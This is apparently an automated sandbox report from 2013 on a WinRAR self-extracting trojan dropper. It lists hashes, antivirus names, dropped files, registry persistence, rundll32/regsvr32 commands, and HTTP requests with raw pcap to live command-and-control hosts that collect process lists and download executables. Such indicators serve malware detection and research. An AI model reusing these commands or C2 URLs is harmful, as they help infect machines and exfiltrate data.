Analysis Date2013-10-24 16:44:10
MD51160b04e3183fbb303b9592aa6b77535
SHA134f9d0dcc32b8c1f40024db582ae6cc9a98aa3a8

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: bdb02840d1de7403793bef402d4fd932 sha1: 1a6c4d6a4b25f7f5e56a28bd8011a16ed0a77e94 size: 67584
Section.rdata md5: 0c817f45c4bbfa6f71b9a36721a782aa sha1: 0b94d64b15b77293b1d6fb54a4876215814f4a95 size: 6144
Section.data md5: 2821477811bfd11f4acd2c1da2aba6da sha1: f28af599dffabff91bb1c6fce831f020e4799fa8 size: 512
Section.CRT md5: 8f145b33e44f60719eb8afa09e213512 sha1: c77f4bbfe96b04f1834e748667637410ce7a0a8f size: 512
Section.rsrc md5: 88667f74f73ff91d60ca18a2671deeaa sha1: 55b837e4a1ba7177c8591d7b70cba14b968f143d size: 16384
Timestamp2009-06-30 06:15:12
Pdb pathd:\Projects\WinRAR\SFX\build\sfxrar32\Release\sfxrar.pdb
PEhash6231dbd8c7a9c2d2346844f778a44f75bb41351a
AVavgGeneric14.DLD
AVclamavWin.Trojan.Agent-108584
AVmsseWorm:VBS/VBSWGbased.gen
AVmsseTrojanDownloader:Win32/Small.AHM
AVmsseTrojan:Win32/Sisproc
AVaviraTR/Dropper.Gen
AVmsseTrojan:Win32/Flymux.A
AVmsseTrojan:Win32/Swisyn.F

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\WinRAR SFX\C%%Documents and Settings%Administrator%Local Settings%Temp% ➝
C:\Documents and Settings\Administrator\Local Settings\Temp\\\x00
Creates Filesmall.exe
Creates File__tmp_rar_sfx_access_check_72296
Creates Fileb2.exe
Creates File106.exe
Creates File1111.exe
Creates Filead005.exe
Creates Filea1.vbs
Deletes File__tmp_rar_sfx_access_check_72296
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\b2.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\ad005.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\ad005.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\106.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\1111.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\small.exe

Process
↳ cmd.exe /c rundll32 setupapi,InstallHinfSection DefaultInstall 132 C:\WINDOWS\system32\NotDel.inf

Creates Processrundll32 setupapi,InstallHinfSection DefaultInstall 132 C:\WINDOWS\system32\NotDel.inf

Process
↳ cmd.exe /c rundll32 setupapi,InstallHinfSection DefaultInstall 132 C:\WINDOWS\system32\NotDel.inf

Creates Processrundll32 setupapi,InstallHinfSection DefaultInstall 132 C:\WINDOWS\system32\Favorites.inf

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\small.exe

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Softfy\LockPage\LockPageNum ➝
NULL
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Softfy\Plug\PlugUserName ➝
full12\\x00
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Softfy\PlugName\LogonName ➝
sfbj2.dll\\x00
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Softfy\CSID\csid ➝
{C4560D12-CE25-4A2E-A5D4-B5070FCBE282}\\x00
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Softfy\PlugDown\PlugOne ➝
1.0.0\\x00
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Softfy\WebIni\WebIniVer ➝
1.0.0\\x00
Creates FileC:\WINDOWS\system32\sufqkn.exe
Creates FileC:\WINDOWS\System32\sfbj2.dll
Creates FileC:\WINDOWS\System32\sfbji.dll
Creates File375O540.bat
Creates FileC:\WINDOWS\System32\dllcache\sfbj2.dll
Creates FileC:\WINDOWS\System32\ghjik.dll
Creates Process375O540.bat
Creates ProcessC:\WINDOWS\system32\sufqkn.exe
Creates Processregsvr32 /s C:\WINDOWS\System32\sfbji.dll
Creates Processrundll32 sfbj2.dll , InstallMyDll
Creates Processregsvr32 /s C:\WINDOWS\System32\ghjik.dll
Creates MutexDBWinMutex

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\106.exe

RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0006\NetworkAddress ➝
222222222222\\x00
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0003\NetworkAddress ➝
222222222222\\x00
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0000\NetworkAddress ➝
222222222222\\x00
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0009\NetworkAddress ➝
222222222222\\x00
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0001\NetworkAddress ➝
222222222222\\x00
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0010\NetworkAddress ➝
222222222222\\x00
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0002\NetworkAddress ➝
222222222222\\x00
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0008\NetworkAddress ➝
222222222222\\x00
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0011\NetworkAddress ➝
222222222222\\x00
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0005\NetworkAddress ➝
222222222222\\x00
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0004\NetworkAddress ➝
222222222222\\x00
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0007\NetworkAddress ➝
222222222222\\x00
Creates FileC:\WINDOWS\system32\Favorites.inf
Creates FileC:\WINDOWS\Favorites\AV\\xc3\\x94\\xc2\\xb0.lnk
Creates FileC:\WINDOWS\system32\NotDel.inf
Creates FileC:\WINDOWS\system32\RCX3.tmp
Creates FileC:\AV\\xc3\\x94\\xc2\\xb0.lnk
Creates FileC:\WINDOWS\system32\ctfmon.exe
Creates File\Device\Netbios
Creates FileC:\WINDOWS\system32\vic1.tmp
Creates FilePIPE\wkssvc
Creates FileC:\AV\\xc3\\x94\\xc2\\xb0.lnk
Deletes FileC:\WINDOWS\system32\Favorites.inf
Deletes FileC:\WINDOWS\system32\vic1.tmp
Deletes FileC:\WINDOWS\system32\NotDel.inf
Deletes FileC:\WINDOWS\system32\hos2.tmp
Creates Processcmd.exe /c rundll32 setupapi,InstallHinfSection DefaultInstall 132 C:\WINDOWS\system32\NotDel.inf
Creates Processcmd.exe /c rundll32 setupapi,InstallHinfSection DefaultInstall 132 C:\WINDOWS\system32\NotDel.inf
Creates Mutexoye
Winsock URLhttp://www.baidu.com/index.html?id=10006
Winsock URLhttp://121.12.104.26:16//jilu.asp?mac=\\x94\\\xc3w\\x80%\\xc1w\\xff\\xff\\xff\\xff\\xad\\x03\\xc3w\\xb2\\xed\\xc3w\\x03&ver=2010-08-05&TG=10006&CP=seo&key=-101&JC=30&YP=c059900a&LJ=[System Process];System;smss.exe;csrss.exe;winlogon.exe;services.exe;lsass.exe;svchost.exe;svchost.exe;svchost.exe;svchost.exe;svchost.exe;spoolsv.exe;alg.exe;userinit.exe;explorer.exe;reader_sl.exe;svchost.exe;monitor.exe;106.exe;1111.exe;rundll32.exe;ad005.exe;cmd.exe;rundll32.exe;wmiprvse.exe;wscript.exe;alh.exe;cmd.exe;rundll32.exe;
Winsock URLhttp://121.12.104.26:16/seo/xxjfldsjflj10006.rar

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\1111.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell ➝
explorer.exe,c:\windows\system32\SVDH0ST.exe\\x00
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Desktop\chajianlm\ ➝
chajianlm\\x00
Creates Filec:\windows\system32\mingdan.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates Filec:\windows\system32\SVDH0ST.exe
Creates File\Device\Netbios
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\WINDOWS\system32\sipadaad.txt
Creates Filec:\windows\system32\SVCH0SP.EXE
Creates Filec:\windows\system32\andan.txt
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates Filec:\windows\system32\SVCH0SP.dll
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\~DFE89C.tmp
Creates Processcmd /c regsvr32 /s c:\windows\system32\SVCH0SP.dll
Creates ProcessSVCH0SP.EXE
Winsock DNSwwwwww.adq.cc
Winsock DNSadq.cc
Winsock URLhttp://wwwwww.adq.cc:81/ad/andan.rar?id=chajianlm
Winsock URLhttp://wwwwww.adq.cc:81/ALexa/aabbcc10004.rar?mac=00-00-00-00-00-001
Winsock URLhttp://wwwwww.adq.cc:81/ad/Url.rar?id=chajianlm
Winsock URLhttp://wwwwww.adq.cc:81/ALexa/aabbcc10004.rar?mac=00-00-00-00-00-002
Winsock URLhttp://wwwwww.adq.cc:81/ALexa/aabbcc10004.rar?mac=00-00-00-00-00-00
Winsock URL?id=chajianlm

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\ad005.exe

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\ad005.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\ad005.exe

Creates Filec:\SaveTxta716.txt
Creates FileC:\Program Files\Docmentt\vxvof.exe
Creates ProcessC:\Program Files\Docmentt\vxvof.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\b2.exe

Creates FileC:\WINDOWS\system32\tbhdz.ico
Creates FilePHYSICALDRIVE0
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\alh.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\alh.exe

Process
↳ rundll32 setupapi,InstallHinfSection DefaultInstall 132 C:\WINDOWS\system32\NotDel.inf

Process
↳ rundll32 setupapi,InstallHinfSection DefaultInstall 132 C:\WINDOWS\system32\Favorites.inf

Process
↳ regsvr32 /s C:\WINDOWS\System32\sfbji.dll

RegistryHKEY_CLASSES_ROOT\TestAtl.ATlMy.1\ ➝
ATlMy Class\\x00
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskScheduler\{C4560D12-CE25-4A2E-A5D4-B5070FCBE282} ➝
csiddll\\x00
RegistryHKEY_CLASSES_ROOT\TestAtl.ATlMy\ ➝
ATlMy Class\\x00
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePhysicalDrive0
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutexdllmux
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!

Process
↳ rundll32 sfbj2.dll , InstallMyDll

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Softfy\Plug\PlugSendNum ➝
1
Creates FilePhysicalDrive0
Creates Mutexdllmux

Process
↳ C:\WINDOWS\system32\sufqkn.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden ➝
NULL

Process
↳ regsvr32 /s C:\WINDOWS\System32\ghjik.dll

Process
↳ 375O540.bat

Process
↳ cmd /c regsvr32 /s c:\windows\system32\SVCH0SP.dll

Process
↳ SVCH0SP.EXE

Process
↳ C:\Program Files\Docmentt\vxvof.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\alh.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FilePHYSICALDRIVE0
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\228.tmp
Deletes FileC:\WINDOWS\VB.ini
Winsock DNS2.765321.info

Network Details:

DNSwww.qq678.info
Type: A
82.98.86.174
DNSwww.a.shifen.com
Type: A
180.76.3.151
DNS2.765321.info
Type: A
82.98.86.169
DNSwww.abc789.info
Type: A
202.172.28.165
DNSwww.superqqface.com
Type: A
DNSwww.baidu.com
Type: A
DNSadq.cc
Type: A
DNSwwwwww.adq.cc
Type: A
HTTP GEThttp://121.12.104.26:16//jilu.asp?mac=.\.w.%.w.......w...w.&ver=2010-08-05&TG=10006&CP=seo&key=-101&JC=30&YP=c059900a&LJ=[System%20Process];System;smss.exe;csrss.exe;winlogon.exe;services.exe;lsass.exe;svchost.exe;svchost.exe;svchost.exe;svchost.exe;svchost.exe;spoolsv.exe;alg.exe;userinit.exe;explorer.exe;reader_sl.exe;svchost.exe;monitor.exe;106.exe;1111.exe;rundll32.exe;ad005.exe;cmd.exe;rundll32.exe;wmiprvse.exe;wscript.exe;alh.exe;cmd.exe;rundll32.exe;
User-Agent: RookIE/1.0
HTTP GEThttp://www.qq678.info/xuke/bat/aq1.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.baidu.com/index.html?id=10006
User-Agent: RookIE/1.0
HTTP GEThttp://www.qq678.info/xuke/csrss.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://2.765321.info:4321/sms/do.php?userid=XXXXXXXXXXXX&time=2013-10-24_14:50:28&msg=01702830524047&pauid=1126711&fy=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://2.765321.info:4321/sms/xxx4.ini
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://121.12.104.26:16/seo/xxjfldsjflj10006.rar
User-Agent: RookIE/1.0
HTTP GEThttp://www.abc789.info/xuke/winlogon.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://2.765321.info:4321/sms/xxx01.ini
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://2.765321.info:4321/sms/do.php?userid=XXXXXXXXXXXX&time=2013-10-24_14:50:28&msg=01702830524047&pauid=1126711&fy=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://121.12.104.26:16/seo/xxjfldsjflj10006.rar
User-Agent: RookIE/1.0
HTTP GEThttp://2.765321.info:4321/sms/xxx4.ini
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://2.765321.info:4321/sms/do.php?userid=XXXXXXXXXXXX&time=2013-10-24_14:50:28&msg=01702830524047&pauid=1126711&fy=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://2.765321.info:4321/sms/xxx01.ini
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://2.765321.info:4321/sms/xxx4.ini
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://2.765321.info:4321/sms/do.php?userid=XXXXXXXXXXXX&time=2013-10-24_14:50:28&msg=01702830524047&pauid=1126711&fy=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://2.765321.info:4321/sms/xxx01.ini
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://2.765321.info:4321/sms/xxx4.ini
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://2.765321.info:4321/sms/do.php?userid=XXXXXXXXXXXX&time=2013-10-24_14:50:28&msg=01702830524047&pauid=1126711&fy=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1031 ➝ 121.12.104.26:16
Flows TCP192.168.1.1:1035 ➝ 82.98.86.174:80
Flows TCP192.168.1.1:1037 ➝ 180.76.3.151:80
Flows TCP192.168.1.1:1039 ➝ 82.98.86.174:80
Flows TCP192.168.1.1:1040 ➝ 82.98.86.169:4321
Flows TCP192.168.1.1:1041 ➝ 82.98.86.169:4321
Flows TCP192.168.1.1:1042 ➝ 121.12.104.26:16
Flows TCP192.168.1.1:1043 ➝ 202.172.28.165:80
Flows TCP192.168.1.1:1044 ➝ 82.98.86.169:4321
Flows TCP192.168.1.1:1045 ➝ 82.98.86.169:4321
Flows TCP192.168.1.1:1046 ➝ 121.12.104.26:16
Flows TCP192.168.1.1:1047 ➝ 82.98.86.169:4321
Flows TCP192.168.1.1:1048 ➝ 82.98.86.169:4321
Flows TCP192.168.1.1:1049 ➝ 82.98.86.169:4321
Flows TCP192.168.1.1:1050 ➝ 82.98.86.169:4321
Flows TCP192.168.1.1:1051 ➝ 82.98.86.169:4321
Flows TCP192.168.1.1:1052 ➝ 82.98.86.169:4321
Flows TCP192.168.1.1:1053 ➝ 82.98.86.169:4321
Flows TCP192.168.1.1:1054 ➝ 82.98.86.169:4321

Raw Pcap
0x00000000 (00000)   47455420 2f2f6a69 6c752e61 73703f6d   GET //jilu.asp?m
0x00000010 (00016)   61633d94 5cc37780 25c177ff ffffffad   ac=.\.w.%.w.....
0x00000020 (00032)   03c377b2 edc37703 26766572 3d323031   ..w...w.&ver=201
0x00000030 (00048)   302d3038 2d303526 54473d31 30303036   0-08-05&TG=10006
0x00000040 (00064)   2643503d 73656f26 6b65793d 2d313031   &CP=seo&key=-101
0x00000050 (00080)   264a433d 33302659 503d6330 35393930   &JC=30&YP=c05990
0x00000060 (00096)   3061264c 4a3d5b53 79737465 6d253230   0a&LJ=[System%20
0x00000070 (00112)   50726f63 6573735d 3b537973 74656d3b   Process];System;
0x00000080 (00128)   736d7373 2e657865 3b637372 73732e65   smss.exe;csrss.e
0x00000090 (00144)   78653b77 696e6c6f 676f6e2e 6578653b   xe;winlogon.exe;
0x000000a0 (00160)   73657276 69636573 2e657865 3b6c7361   services.exe;lsa
0x000000b0 (00176)   73732e65 78653b73 7663686f 73742e65   ss.exe;svchost.e
0x000000c0 (00192)   78653b73 7663686f 73742e65 78653b73   xe;svchost.exe;s
0x000000d0 (00208)   7663686f 73742e65 78653b73 7663686f   vchost.exe;svcho
0x000000e0 (00224)   73742e65 78653b73 7663686f 73742e65   st.exe;svchost.e
0x000000f0 (00240)   78653b73 706f6f6c 73762e65 78653b61   xe;spoolsv.exe;a
0x00000100 (00256)   6c672e65 78653b75 73657269 6e69742e   lg.exe;userinit.
0x00000110 (00272)   6578653b 6578706c 6f726572 2e657865   exe;explorer.exe
0x00000120 (00288)   3b726561 6465725f 736c2e65 78653b73   ;reader_sl.exe;s
0x00000130 (00304)   7663686f 73742e65 78653b6d 6f6e6974   vchost.exe;monit
0x00000140 (00320)   6f722e65 78653b31 30362e65 78653b31   or.exe;106.exe;1
0x00000150 (00336)   3131312e 6578653b 72756e64 6c6c3332   111.exe;rundll32
0x00000160 (00352)   2e657865 3b616430 30352e65 78653b63   .exe;ad005.exe;c
0x00000170 (00368)   6d642e65 78653b72 756e646c 6c33322e   md.exe;rundll32.
0x00000180 (00384)   6578653b 776d6970 72767365 2e657865   exe;wmiprvse.exe
0x00000190 (00400)   3b777363 72697074 2e657865 3b616c68   ;wscript.exe;alh
0x000001a0 (00416)   2e657865 3b636d64 2e657865 3b72756e   .exe;cmd.exe;run
0x000001b0 (00432)   646c6c33 322e6578 653b2048 5454502f   dll32.exe; HTTP/
0x000001c0 (00448)   312e310d 0a557365 722d4167 656e743a   1.1..User-Agent:
0x000001d0 (00464)   20526f6f 6b49452f 312e300d 0a486f73    RookIE/1.0..Hos
0x000001e0 (00480)   743a2031 32312e31 322e3130 342e3236   t: 121.12.104.26
0x000001f0 (00496)   3a31360d 0a0d0a                       :16....

0x00000000 (00000)   47455420 2f78756b 652f6261 742f6171   GET /xuke/bat/aq
0x00000010 (00016)   312e6874 6d6c2048 5454502f 312e310d   1.html HTTP/1.1.
0x00000020 (00032)   0a416363 6570743a 202a2f2a 0d0a4163   .Accept: */*..Ac
0x00000030 (00048)   63657074 2d4c616e 67756167 653a2065   cept-Language: e
0x00000040 (00064)   6e2d7573 0d0a4163 63657074 2d456e63   n-us..Accept-Enc
0x00000050 (00080)   6f64696e 673a2067 7a69702c 20646566   oding: gzip, def
0x00000060 (00096)   6c617465 0d0a5573 65722d41 67656e74   late..User-Agent
0x00000070 (00112)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000080 (00128)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000090 (00144)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x000000a0 (00160)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x000000b0 (00176)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x000000c0 (00192)   6f73743a 20777777 2e717136 37382e69   ost: www.qq678.i
0x000000d0 (00208)   6e666f0d 0a436f6e 6e656374 696f6e3a   nfo..Connection:
0x000000e0 (00224)   204b6565 702d416c 6976650d 0a0d0a65    Keep-Alive....e
0x000000f0 (00240)   78653b73 706f6f6c 73762e65 78653b61   xe;spoolsv.exe;a
0x00000100 (00256)   6c672e65 78653b75 73657269 6e69742e   lg.exe;userinit.
0x00000110 (00272)   6578653b 6578706c 6f726572 2e657865   exe;explorer.exe
0x00000120 (00288)   3b726561 6465725f 736c2e65 78653b73   ;reader_sl.exe;s
0x00000130 (00304)   7663686f 73742e65 78653b6d 6f6e6974   vchost.exe;monit
0x00000140 (00320)   6f722e65 78653b31 30362e65 78653b31   or.exe;106.exe;1
0x00000150 (00336)   3131312e 6578653b 72756e64 6c6c3332   111.exe;rundll32
0x00000160 (00352)   2e657865 3b616430 30352e65 78653b63   .exe;ad005.exe;c
0x00000170 (00368)   6d642e65 78653b72 756e646c 6c33322e   md.exe;rundll32.
0x00000180 (00384)   6578653b 776d6970 72767365 2e657865   exe;wmiprvse.exe
0x00000190 (00400)   3b777363 72697074 2e657865 3b616c68   ;wscript.exe;alh
0x000001a0 (00416)   2e657865 3b636d64 2e657865 3b72756e   .exe;cmd.exe;run
0x000001b0 (00432)   646c6c33 322e6578 653b2048 5454502f   dll32.exe; HTTP/
0x000001c0 (00448)   312e310d 0a557365 722d4167 656e743a   1.1..User-Agent:
0x000001d0 (00464)   20526f6f 6b49452f 312e300d 0a486f73    RookIE/1.0..Hos
0x000001e0 (00480)   743a2031 32312e31 322e3130 342e3236   t: 121.12.104.26
0x000001f0 (00496)   3a31360d 0a0d0a                       :16....

0x00000000 (00000)   47455420 2f696e64 65782e68 746d6c3f   GET /index.html?
0x00000010 (00016)   69643d31 30303036 20485454 502f312e   id=10006 HTTP/1.
0x00000020 (00032)   310d0a55 7365722d 4167656e 743a2052   1..User-Agent: R
0x00000030 (00048)   6f6f6b49 452f312e 300d0a48 6f73743a   ookIE/1.0..Host:
0x00000040 (00064)   20777777 2e626169 64752e63 6f6d0d0a    www.baidu.com..
0x00000050 (00080)   0d0a696e 673a2067 7a69702c 20646566   ..ing: gzip, def
0x00000060 (00096)   6c617465 0d0a5573 65722d41 67656e74   late..User-Agent
0x00000070 (00112)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000080 (00128)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000090 (00144)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x000000a0 (00160)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x000000b0 (00176)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x000000c0 (00192)   6f73743a 20777777 2e717136 37382e69   ost: www.qq678.i
0x000000d0 (00208)   6e666f0d 0a436f6e 6e656374 696f6e3a   nfo..Connection:
0x000000e0 (00224)   204b6565 702d416c 6976650d 0a0d0a65    Keep-Alive....e
0x000000f0 (00240)   78653b73 706f6f6c 73762e65 78653b61   xe;spoolsv.exe;a
0x00000100 (00256)   6c672e65 78653b75 73657269 6e69742e   lg.exe;userinit.
0x00000110 (00272)   6578653b 6578706c 6f726572 2e657865   exe;explorer.exe
0x00000120 (00288)   3b726561 6465725f 736c2e65 78653b73   ;reader_sl.exe;s
0x00000130 (00304)   7663686f 73742e65 78653b6d 6f6e6974   vchost.exe;monit
0x00000140 (00320)   6f722e65 78653b31 30362e65 78653b31   or.exe;106.exe;1
0x00000150 (00336)   3131312e 6578653b 72756e64 6c6c3332   111.exe;rundll32
0x00000160 (00352)   2e657865 3b616430 30352e65 78653b63   .exe;ad005.exe;c
0x00000170 (00368)   6d642e65 78653b72 756e646c 6c33322e   md.exe;rundll32.
0x00000180 (00384)   6578653b 776d6970 72767365 2e657865   exe;wmiprvse.exe
0x00000190 (00400)   3b777363 72697074 2e657865 3b616c68   ;wscript.exe;alh
0x000001a0 (00416)   2e657865 3b636d64 2e657865 3b72756e   .exe;cmd.exe;run
0x000001b0 (00432)   646c6c33 322e6578 653b2048 5454502f   dll32.exe; HTTP/
0x000001c0 (00448)   312e310d 0a557365 722d4167 656e743a   1.1..User-Agent:
0x000001d0 (00464)   20526f6f 6b49452f 312e300d 0a486f73    RookIE/1.0..Hos
0x000001e0 (00480)   743a2031 32312e31 322e3130 342e3236   t: 121.12.104.26
0x000001f0 (00496)   3a31360d 0a0d0a                       :16....

0x00000000 (00000)   47455420 2f78756b 652f6373 7273732e   GET /xuke/csrss.
0x00000010 (00016)   65786520 48545450 2f312e31 0d0a4163   exe HTTP/1.1..Ac
0x00000020 (00032)   63657074 3a202a2f 2a0d0a41 63636570   cept: */*..Accep
0x00000030 (00048)   742d456e 636f6469 6e673a20 677a6970   t-Encoding: gzip
0x00000040 (00064)   2c206465 666c6174 650d0a55 7365722d   , deflate..User-
0x00000050 (00080)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000060 (00096)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000070 (00112)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000080 (00128)   73204e54 20352e31 3b205356 313b202e   s NT 5.1; SV1; .
0x00000090 (00144)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x000000a0 (00160)   37290d0a 486f7374 3a207777 772e7171   7)..Host: www.qq
0x000000b0 (00176)   3637382e 696e666f 0d0a436f 6e6e6563   678.info..Connec
0x000000c0 (00192)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000d0 (00208)   0d0a0d0a 0a436f6e 6e656374 696f6e3a   .....Connection:
0x000000e0 (00224)   204b6565 702d416c 6976650d 0a0d0a65    Keep-Alive....e
0x000000f0 (00240)   78653b73 706f6f6c 73762e65 78653b61   xe;spoolsv.exe;a
0x00000100 (00256)   6c672e65 78653b75 73657269 6e69742e   lg.exe;userinit.
0x00000110 (00272)   6578653b 6578706c 6f726572 2e657865   exe;explorer.exe
0x00000120 (00288)   3b726561 6465725f 736c2e65 78653b73   ;reader_sl.exe;s
0x00000130 (00304)   7663686f 73742e65 78653b6d 6f6e6974   vchost.exe;monit
0x00000140 (00320)   6f722e65 78653b31 30362e65 78653b31   or.exe;106.exe;1
